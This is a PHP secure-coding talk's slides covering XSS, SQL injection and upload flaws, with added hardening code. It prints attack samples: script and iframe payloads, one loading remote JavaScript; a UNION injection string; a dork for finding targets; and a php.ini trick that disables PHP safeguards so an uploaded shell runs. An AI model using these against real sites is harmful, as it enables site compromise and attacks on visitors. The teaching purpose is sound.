
Secure Web App Programming

in PHP
Akash Mahajan | Web Security Consultant
Speaking at BPUG on 24th April 2010
Akash Mahajan | About Me
 Freelance Web Security Consultant
 Chapter lead for null Bangalore http://null.co.in
 Authoring 2 chapters of the OWASP Development Guide 2010 (not alone)
Akash Mahajan | About Me
 I test, hack, secure web applications, servers.
 Consult companies on secure deployments on AWS etc. http://akashm.com
 Doing PHP programming for a long time now.
 Been doing application security for 5+ years.
 Used to write IDS sigs for malware and vulns for 3 years.
Cross Site Scripting - XSS
 Injecting HTML/JavaScript into the site.
 Non-persistent/Reflected/First Order
▪ Script is taken from the request and displayed in the browser directly
▪ example.com/search?q=<script>alert('hi');</script>
▪ example.com/index.php?lang=path to php shell (strictly a file-inclusion vector rather than XSS, but the same root cause: request data reaching a sensitive sink without validation)
 Persistent/Stored/Second Order
▪ The first-name field of a registration form is vulnerable and the value is stored in the database
▪ Hello <iframe src=http://f1y.in/0.js></iframe>
 DOM Based
▪ No example here; described by Amit Klein in his paper "DOM Based Cross Site Scripting or XSS of the Third Kind"
XSS - Mitigation in PHP
 Sanitize all globals ($_GET, $_POST, $_COOKIE)
 Use strip_tags() (it only removes tags; it does nothing for attribute or JavaScript contexts, so it is not a substitute for escaping on output)
 Use the Inspekt library http://code.google.com/p/inspekt
 Use OWASP ESAPI http://code.google.com/p/owasp-esapi-php/
 Escape everything before displaying
 htmlentities(), htmlspecialchars()
 Client headers like User-Agent can be malicious as well.
XSS - Mitigation in PHP
 Rule of thumb: if it's not your data, consider it tainted.
 If you can verify it, consider it trusted.
 After validating it, classify it as known-good or known-bad.
 Whitelisting (accept only what you expect) verifies good data far better than blacklisting (reject what you think is bad).
 See examples at xssed.com and the null Keeda project.
 Use frameworks like CodeIgniter and use their input/output functions.
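The two halves of the rule above (validate on input, escape on output) in code. This is an added example written for this page, not code from the slides or from the libraries they mention; the translation-file layout under lang/ and the list of allowed language codes are assumptions for the sake of illustration.

```php
<?php
// Added example (not from the slides): whitelist validation on input,
// context-aware escaping on output. Handles both reflected payloads from
// the XSS slide: ?q=<script>... and ?lang=<path to php shell>.

// Escape for an HTML text or quoted-attribute context.
// ENT_QUOTES escapes single quotes too, so value='...' attributes are safe;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Whitelist validation: only values we explicitly ship are accepted.
// Anything else falls back to a safe default rather than being "cleaned".
function pickLanguage(?string $lang): string
{
    $allowed = ['en', 'de', 'hi', 'kn'];   // assumed list of shipped translations
    return in_array($lang, $allowed, true) ? $lang : 'en';
}

// The request never supplies a path; the validated key selects the file.
$lang = pickLanguage($_GET['lang'] ?? null);
include __DIR__ . "/lang/{$lang}.php";   // assumed layout: lang/en.php, lang/de.php, ...

// Reflected value: the slide's payload <script>alert('hi');</script> comes
// out as literal text because e() is applied at the point of output, in
// both the attribute and the text-node context below.
$q = $_GET['q'] ?? '';
?>
<form method="get" action="search.php">
  <input type="text" name="q" value="<?= e($q) ?>">
  <button type="submit">Search</button>
</form>
<p>Results for <?= e($q) ?></p>
```

Escaping is per context: e() is correct for HTML text and quoted attributes, but a value placed inside a <script> block, a URL, or an unquoted attribute needs a different encoder (OWASP ESAPI, mentioned above, provides these). Note also that the fallback in pickLanguage() is deliberate: rejecting and defaulting is the whitelist approach the slide recommends, whereas stripping "bad" characters from the path is the blacklist approach that keeps failing.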
SQLi - SQL Injection
 Allowing SQL to be injected into the database query.
 The most common attack points are the search box of any dynamic website and its registration forms. These two will definitely be talking to the database.
 $sql = "SELECT * FROM table WHERE id = '" . $_REQUEST['id'] . "'";
 id = ' OR 1 UNION ALL SELECT * FROM table;
 Excellent examples: http://google.com/search?q=site:slideshare.net sql injection
 Google dork: "inurl:php?id="
SQL Injection – Mitigation in PHP
 mysql_real_escape_string()
 $dbquery = sprintf("SELECT name FROM user WHERE id='%s'", mysql_real_escape_string($_GET['id']));
 Parameterized queries
 $res = $query("SELECT name FROM user WHERE id=?", $id);
 The legacy mysql extension does not support parameterized queries. You need mysqli (or PDO) prepared statements.
 Stored Procedures
 See a kickass example of a stored procedure used in the mass SQL injection that hit more than a hundred thousand websites
▪ http://www.breach.com/resources/breach-security-labs/alerts/mass-sql-injection-attack-evolutio
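The concatenated query from the previous slide beside a prepared-statement version, as an added example for this page (not code from the slides). It uses the mysqli extension the slide points to; the `user` table with integer `id` and `name` columns, and the connection credentials, are assumptions. The legacy mysql_* functions used on the slide were removed in PHP 7, so mysqli or PDO is the only option on a current interpreter anyway.

```php
<?php
// Added example (not from the slides): string-built query vs. prepared
// statement with mysqli. Assumes a `user` table (id INT, name VARCHAR).

// VULNERABLE: $id is spliced into the SQL text, so the payload from the
// SQLi slide,  ' OR 1 UNION ALL SELECT ... , rewrites the query itself.
function findUserUnsafe(mysqli $db, string $id): ?array
{
    $sql = "SELECT name FROM user WHERE id = '" . $id . "'";
    $res = $db->query($sql);
    return $res ? $res->fetch_assoc() : null;
}

// HARDENED: the statement is compiled with a placeholder first and the
// value bound afterwards, so the value can never become SQL syntax.
function findUser(mysqli $db, int $id): ?array
{
    $stmt = $db->prepare("SELECT name FROM user WHERE id = ?");
    $stmt->bind_param('i', $id);          // 'i' = bind as integer
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // get_result() needs mysqlnd (default since PHP 5.4)
    $stmt->close();
    return $row ?: null;
}

// Assumed connection details for the example.
$db = new mysqli('localhost', 'app', 'secret', 'appdb');
// Tell the driver the connection charset explicitly: escaping routines that
// do not know the real charset are what the multibyte bypasses exploit.
$db->set_charset('utf8mb4');

// Validate the type before the value gets anywhere near the query.
// filter_input() returns false for a non-integer and null if the key is missing.
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT);
if ($id === false || $id === null) {
    http_response_code(400);
    exit('bad id');
}

var_dump(findUser($db, $id));
```

Two things to notice: the prepared statement protects the query even without the integer check, but validating the type first gives a clean 400 instead of a database error the attacker can read; and set_charset() is not optional when any escaping function is still in use elsewhere, which is the point of the addslashes versus mysql_real_escape_string discussion linked later in this deck.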
File Uploads
 A lot of webapps add a directory in the document root for storing file uploads and give it write access.
 They don't randomize filenames. So a specially crafted image file which has PHP code written into it gets saved there.
 The malicious user is now free to call it with a GET request and it gets executed.
 http://www.scanit.be/uploads/php-file-upload.pdf
File Uploads – Mitigation in PHP
 The usual use case is uploading of image files.
 Use getimagesize() to get the correct MIME type of the file from the file header, not from the client-supplied name or $_FILES['type'].
 Generate a random file name
 $rand = time() . substr(md5(microtime()), 0, rand(5, 12));
 (time and microtime are guessable, so this is only obscurity; use random_bytes() where available)
 Return $rand with a whitelisted extension appended
 Ideally the upload directory should live outside the document root, or the web server should be configured not to run scripts from it. A noexec mount option alone does not help: it stops the kernel executing binaries, but PHP still interprets a .php file it is handed.
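The mitigation steps above put together into one upload handler, as an added example for this page (not code from the slides). It replaces the time()/md5(microtime()) name with random_bytes(), derives the extension from the detected image type rather than the client's filename, stores the file outside the document root and serves it back through a script. The UPLOAD_DIR path, the `avatar` form field and the size limit are assumptions.

```php
<?php
// Added example (not from the slides): upload handler following the
// slide's checklist. Assumed: UPLOAD_DIR is outside the web root and the
// web server has no PHP handler mapped there.

const UPLOAD_DIR = '/var/app/uploads';      // assumed location, not under docroot
const MAX_BYTES  = 2 * 1024 * 1024;         // assumed 2 MiB limit

function storeImage(array $file): string
{
    if ($file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed: ' . $file['error']);
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Type comes from the bytes on disk, not from $_FILES['type'] or the name.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false) {
        throw new RuntimeException('not an image');
    }
    // Whitelist of accepted image types; extension is ours, not the client's.
    $extByType = [IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png', IMAGETYPE_GIF => 'gif'];
    $ext = $extByType[$info[2]] ?? null;
    if ($ext === null) {
        throw new RuntimeException('image type not allowed');
    }
    // Unguessable name from the CSPRNG: 16 bytes -> 32 hex chars.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . '/' . $name;
    // move_uploaded_file() refuses anything that is not a real upload.
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

// Serving: the script decides what is sent, and the web server never
// interprets anything in UPLOAD_DIR as code.
function serveImage(string $name): void
{
    // Only names we generate are accepted: no traversal, no other extensions.
    if (!preg_match('/^[0-9a-f]{32}\.(jpg|png|gif)$/', $name)) {
        http_response_code(404);
        exit;
    }
    $path = UPLOAD_DIR . '/' . $name;
    if (!is_file($path)) {
        http_response_code(404);
        exit;
    }
    $info = getimagesize($path);
    header('Content-Type: ' . $info['mime']);
    header('X-Content-Type-Options: nosniff');   // stop browsers re-guessing the type
    header('Content-Disposition: inline; filename="' . $name . '"');
    readfile($path);
}

if (isset($_FILES['avatar'])) {
    echo storeImage($_FILES['avatar']);
} elseif (isset($_GET['img'])) {
    serveImage($_GET['img']);
}
```

getimagesize() is a necessary check, not a sufficient one: a valid JPEG with PHP appended after the image data still passes it. That is why the other two steps carry the real weight here, an attacker who cannot guess the name and whose file is never handed to the interpreter has nothing to call. Re-encoding the image with GD or Imagick on upload strips trailing payloads as well and is worth adding when image quality allows it.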
So where are we at?
 At this point you have reasonably ensured that your PHP web application is not compromised.
 But the users connecting to your website are still vulnerable to session hijacking, CSRF from your site, etc.
 There are known bypasses of the standard PHP escaping functions; see this one on addslashes() versus mysql_real_escape_string():
 http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
Bonus | Don't be ev!l ;)
 Create a file "php.ini" in some writeable folder (777), then upload your shell (works where PHP runs as CGI and reads php.ini from the script's directory; mod_php ignores a per-directory php.ini)
 php.ini
safe_mode = OFF
disable_functions = NONE
Thanks for all the fish
 Feel free to email me your questions
 akashmahajan@gmail.com
 Feel free to text me 99805 27182
 Come attend the monthly null BLR meeting. It happens on the 2nd Saturday of every month at Frazer Town. The meets start at 10 AM and end by 12:30 PM – 1 PM.